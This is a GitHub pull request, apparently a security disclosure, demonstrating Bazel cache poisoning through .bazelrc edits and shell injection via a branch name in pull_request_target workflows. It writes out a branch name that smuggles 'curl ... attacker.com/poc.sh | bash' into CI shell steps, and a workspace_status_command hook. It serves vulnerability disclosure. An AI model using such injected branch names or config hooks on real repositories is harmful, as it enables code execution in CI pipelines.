PoC: Script injection via branch name (DO NOT MERGE)#3828
Hidden character warning
PoC: Script injection via branch name (DO NOT MERGE)#3828mabrukhany-beep wants to merge 1 commit into
Conversation
PoC: Demonstrate cache poisoning vulnerability This commit modifies .bazelrc to add environment variables that will be cached by bazel. If the cache is shared with scheduled workflows (ng-renovate.yml), these variables will be present in those workflows, proving cache poisoning from PR workflows. Signed-off-by: mabrukhany-beep <mabrukhany@gmail.com>
There was a problem hiding this comment.
Code Review
This pull request modifies the .bazelrc file to add a proof of concept for cache poisoning. The reviewer identified a critical security vulnerability, noting that the addition of --workspace_status_command and arbitrary environment variables can lead to arbitrary code execution in developer environments and CI/CD pipelines, and requested their immediate removal.
| # PoC: Cache Poisoning Demonstration | ||
| # This proves that bazel cache can be poisoned from PR workflows | ||
| # and executed in scheduled workflows (ng-renovate) | ||
|
|
||
| build --action_env=POC_CACHE_POISONED=true | ||
| test --test_env=POC_CACHE_POISONED=true | ||
| build --workspace_status_command="echo 'PoC: Cache poisoned by PR workflow'" |
There was a problem hiding this comment.
The addition of --workspace_status_command and arbitrary environment variables (--action_env, --test_env) in the shared .bazelrc configuration poses a severe security risk. The workspace_status_command executes arbitrary shell commands during Bazel builds, which can lead to arbitrary code execution (ACE) in developer environments or CI/CD pipelines. These lines must be removed.
Security Proof-of-Concept - DO NOT MERGE
This PR demonstrates script injection via malicious branch name in pull_request_target workflows.
Branch Name
; curl -s https://attacker.com/poc.sh | bash; echoVulnerability
If any workflow uses
github.head_refin arunstep without proper quoting, the branch name will be executed as shell code.Impact
Fix
run: echo '${{ github.head_ref }}'